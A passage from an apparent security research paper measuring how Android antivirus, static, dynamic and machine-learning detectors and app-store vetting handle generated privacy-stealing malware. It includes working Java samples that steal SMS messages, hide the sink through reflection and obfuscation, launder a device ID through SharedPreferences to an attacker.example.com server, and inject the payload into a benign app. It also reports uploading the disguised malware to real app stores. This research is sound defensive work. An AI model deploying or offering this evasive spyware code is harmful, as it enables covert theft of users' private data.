In this section, we evaluate the AMTs using the generated malware and test the four hypotheses.
First, we test the deployed AMTs on Genome malware to establish a baseline understanding of AMTs. Note that we only choose malware with privacy leakage attacks, which account for 78% of the 1,260 samples in Genome. The results are presented in Table 1, where machine learning tools and anti-virus tools perform well in detecting existing malware. As the Genome dataset originated in 2010, anti-virus tools (AVTs), which are mainly based on signature and pattern matching, can accurately detect the malware with an average recall of 71.9%. Still, some AVTs perform poorly, e.g., Bkav (0%), CMC (0%), Malwarebytes (0%) and TheHacker (0%). Since the machine learning tools use 60% of the malware samples in Genome as the training set and the remaining 40% as the testing set, they outperform the other tools with a higher recall.
Table 1. Detection ratio of privacy leakage malware in Genome
Static analysis and dynamic analysis are more time-consuming than the previous two approaches, due to the program analysis they conduct. Static analysis tools only achieve a detection ratio of around 48.4% on Genome malware. The dynamic tool TaintDroid fails to detect existing malware in Genome. The problem is attributed to TaintDroid's limited support for source and sink types, and to compatibility issues when running out-of-date malware on the latest Android OS.
Second, we use Mystique to generate 100 generations of malware without evasion features to evaluate the detection ratio (DR) of AMTs. Then we add evasion features into the malicious apps and re-evaluate the DR. As shown in Table 2, there are two columns for each kind of AMT: the first column is the DR without evasion features, and the second column "(E)" is the DR with evasion features. All DR values are averaged over the tools of a specific type. We summarize the hypothesis testing results as follows.
Table 2. The objective value of generated malware during evolution
H1. The Susceptibility of AVs to Unknown Malware. Mainstream AVs employ signature- or feature-based approaches. Their detection capabilities depend on the completeness and timeliness of the malware database, as well as the abstraction of malware. Generally, they perform very well in detecting known malware, as in the Genome experiment above: they achieve a 71.9% recall on average, and 27 (out of 57) AVs can even detect at least 99% of the malware samples in the experiment. However, they perform poorly in detecting our generated 0-day malware. According to the detection results, only 6 generated malware samples (18 detection cases in total) are detected by the union of these AVs, as shown in Table 3. For example, ESET-NOD32 detects 3 malware samples as "a variant of Android/TrojanSMS.Agent.BLY". By further inspection, we find that the 3 samples steal SMS messages. Specifically, they share one common behavior, shown below: it monitors changes of the Content Provider of SMS, steals all SMS messages, and sends them out to a specific remote server.
CONTENT_OBSERVER::POINTCUT_ONCHANGE::SOURCE(SMS::ALL)→CONTENT_OBSERVER::POINTCUT_ONCHANGE::SINK(SMS::SEND_MESSAGE)
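For illustration, the following minimal sketch (not our actual generated code; the destination number is a placeholder) shows one way such a behavior can be implemented, with the source in onChange() and the sink placed in a separate method:

import android.content.Context;
import android.database.ContentObserver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Handler;
import android.telephony.SmsManager;

public class SmsStealer extends ContentObserver {
    private final Context context;

    public SmsStealer(Context context, Handler handler) {
        super(handler);
        this.context = context;
    }

    @Override
    public void onChange(boolean selfChange) {
        // SOURCE: triggered on every change of the SMS Content Provider; read all messages
        Cursor c = context.getContentResolver()
                .query(Uri.parse("content://sms"), null, null, null, null);
        StringBuilder all = new StringBuilder();
        while (c != null && c.moveToNext()) {
            all.append(c.getString(c.getColumnIndex("address"))).append(':')
               .append(c.getString(c.getColumnIndex("body"))).append('\n');
        }
        if (c != null) c.close();
        leak(all.toString());   // the behavior is split across two methods
    }

    // SINK: forward the collected messages (the destination number is a placeholder)
    private void leak(String payload) {
        SmsManager.getDefault().sendTextMessage("0123456789", null, payload, null, null);
    }
}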
We can conclude that AVs make some effort to infer the semantics of code, since the behavior is detected even though it is split into two methods. However, the inference is quite limited: the malware samples we crafted with evasion techniques can no longer be detected. In general, we consider H1 accepted.
Table 3. Detected malware samples and brief description for contained malicious behaviors
H2. The Insignificant Impact of Evasion Techniques. We generate two malware datasets, one containing malware samples without any evasion features and the other containing malware samples with arbitrary evasion features. Comparing the detection results, evasion features rarely affect the detection results of AVs, but they do help to evade dynamic and static analysis (a 43.7% reduction in DR). Since the dynamic analysis tool TaintDroid tracks the flow of information in the system, it fails to detect the privacy leakage once the flow is complicated by involving ICC or implicit data flow. Static analysis tools that perform code analysis from source to sink can overcome complicated transformation attacks and behavior-level evasion techniques. For example, IccTA takes into account ICCs between different components of apps and can identify privacy-leakage behaviors occurring across multiple components. However, the static analysis in IccTA still has some flaws: it cannot track data flow across persistent storage, such as files, SQLite or shared preferences. Static analysis tools usually employ API matching to identify sources and sinks; therefore, they can be easily defeated by dynamic loading techniques such as reflection and constant encryption (a minimal sketch follows this paragraph). Moreover, for machine learning based tools, evasion features have little impact on DR, and the impact is not significant (the differences between ML and ML(E) in Table 2 are within 5%). We also observe that a higher number of evasion features (#EFs) does not necessarily lead to a lower DR. Thus, we consider H2 partially accepted: certain evasion techniques only work against certain detection approaches, and adding more evasion features does not necessarily bypass detection better.
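As an illustration of this point, the following sketch (not taken from our benchmark) resolves the sink API via reflection and keeps its name obfuscated, so that simple API matching on call sites finds no direct reference to sendTextMessage:

import android.app.PendingIntent;
import android.telephony.SmsManager;
import java.lang.reflect.Method;

public final class ReflectiveSink {

    // Obfuscated method name, decoded only at runtime (a reversed string stands in
    // for the constant-encryption step used by real evasion features).
    private static String sinkName() {
        return new StringBuilder("egasseMtxeTdnes").reverse().toString(); // "sendTextMessage"
    }

    public static void leak(String payload) throws Exception {
        SmsManager sm = SmsManager.getDefault();
        // Resolve and invoke the sink via reflection instead of a direct API call.
        Method send = SmsManager.class.getMethod(sinkName(),
                String.class, String.class, String.class,
                PendingIntent.class, PendingIntent.class);
        send.invoke(sm, "0123456789", null, payload, null, null);
    }
}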
Table 4. The significance of attack features in detection
H3. Diverse Detection Capabilities of AMTs. Based on the detection results on our malware benchmark, we test H3 by evaluating the weaknesses and strengths of each type of approach.
Dynamic analysis is a kind of black-box testing that focuses on the flow of sensitive information into and out of apps, without considering how the behavior is implemented. Therefore, its detection capabilities depend on the coverage of sources, sinks, and the communication channels between them. Our experiments show that TaintDroid can track sensitive information obtained from specific Android APIs, such as getDeviceId and getLine1Number, but it does not track information from incoming SMS messages, Content Providers, etc. It performs well for the ICC channel and file-based channels; however, SQLite and shared preferences can help bypass its detection, as illustrated by the sketch below.
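The sketch below illustrates this bypass under the assumption of a hypothetical exfiltration URL: the tainted device ID is written into SharedPreferences and read back before leaving the device, which severs the data flow that TaintDroid tracks.

import android.content.Context;
import android.content.SharedPreferences;
import android.telephony.TelephonyManager;

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public final class PrefsRelayLeak {

    public static void run(Context ctx) throws Exception {
        // SOURCE tracked by TaintDroid (requires READ_PHONE_STATE)
        TelephonyManager tm =
                (TelephonyManager) ctx.getSystemService(Context.TELEPHONY_SERVICE);
        String id = tm.getDeviceId();

        // Route the value through persistent storage: taint is dropped at the boundary.
        SharedPreferences prefs = ctx.getSharedPreferences("cache", Context.MODE_PRIVATE);
        prefs.edit().putString("k", id).commit();
        String laundered = prefs.getString("k", "");

        // SINK: send the read-back value to a remote server (hypothetical URL)
        HttpURLConnection conn = (HttpURLConnection)
                new URL("http://attacker.example.com/c").openConnection();
        conn.setDoOutput(true);
        OutputStream os = conn.getOutputStream();
        os.write(laundered.getBytes());
        os.close();
        conn.getResponseCode();
        conn.disconnect();
    }
}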
Static analysis is more scalable than dynamic analysis. However, it lacks runtime information, and its capabilities are thereby limited. Recently, some works have used symbolic execution to mitigate the lack of runtime information.
We compare the detection results of two malware sets, one with more attack features and the other with fewer. The set with more attack features is more likely to be detected, while machine learning based approaches are susceptible to malware with fewer attack features. Another comparison is between the two tools RevealDroid and Drebin: although Drebin considers more features, its detection ratio is not improved accordingly. Therefore, the significance, rather than the number, of features better facilitates detection. In Table 4, we list the five attack features that are easiest to detect and the five that are hardest to detect.
It is reasonable for AVs to use a fast approach with a low false positive rate. Our observation is that AVs mainly aim at detecting known malware. Hence, AVs work in a reactive way, not in a proactive way.
To sum up, we consider that H3 should be rejected. Considering the detection results of TaintDroid in Table 2, we cannot confirm that dynamic tools produce high detection accuracy, although they can provide more accurate information during detection. The problem lies in the difficulty of triggering malicious behaviors during execution. Note that, due to the unavailability of other dynamic tools, we cannot generalize this conclusion to all dynamic tools.
H4. Strong Vetting Process in Modern App Stores. Modern Android app stores employ multiple techniques to inspect submitted apps and protect their marketplaces. Google Play has moved from offline dynamic analysis (Bouncer) to manual checks by human experts. Currently, the Android app stores GetJar, SlideMe, and TorrApk all inspect submitted apps with human experts.
Figure 1. Malicious behaviors to be repackaged
Since our generated malware has no normal functionality other than its malicious behaviors, it was rejected when we submitted it to these four app stores. To address this, we downloaded three open-source benign apps (benignware), which have been verified by AMTs and approved by Google Play. We inject our malicious behaviors into their source code, repackage them, and then submit them to the four Android app stores. One example of the injected malicious behaviors is shown in Fig. 1: it acquires 5 permissions and steals SMS messages and device identity information, sending them to a particular server.
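As a sketch of how the injection works (the class and resource names here are hypothetical), the payload is simply started from an existing entry point of the benign base, so that the repackaged app keeps its normal behavior while leaking data in the background:

import android.app.Activity;
import android.os.Bundle;

public class HostMainActivity extends Activity {  // original Activity of the benign base

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);   // the benign UI is left untouched

        // Injected lines: launch the malicious behavior on a background thread.
        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    PrefsRelayLeak.run(getApplicationContext()); // e.g., the payload sketched above
                } catch (Exception ignored) { }
            }
        }).start();
    }
}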
For each of the 3 benignware (benign base), we select 4 malware samples from our benchmark and inject them into the benign base.
Table 5. The capabilities of the vetting process in modern marketplaces
The 4 malware samples are as follows: 1) a malicious app without evasion features; 2) a malicious app generated by adding evasion features to the first one; 3) an optimal malware sample from our benchmark; and 4) a randomly chosen sample from our malware benchmark. The 4 different malicious apps derived from the same benign base are submitted to the four different app stores. Table 5 shows the detection results for these apps, where ✓ and ✗ indicate that an app is approved (not detected) and rejected (detected) by the corresponding app store, respectively. From this experiment, we conclude that the vetting processes of Android app stores still have severe flaws and can be easily bypassed. Although human inspection can judge the quality of apps with high confidence, the security of apps is not fully inspected.
According to our observations, we consider that H4 should be rejected. Note that the malware samples used for injection are detected by the AMTs at a ratio of only 0% to 22.8%; thus, the vetting results are not significantly better than the results of our AMTs. We suspect that the vetting process also relies on AMTs for detection.
The following figures show proof of the malware uploaded to Android marketplaces, and screenshots showing that our honeypots have collected the stolen information.
Figure 2. The uploaded malware sample in Google Play
Figure 3. The uploaded malware sample in TorrApk
Figure 4. The stolen information collected by the uploaded malware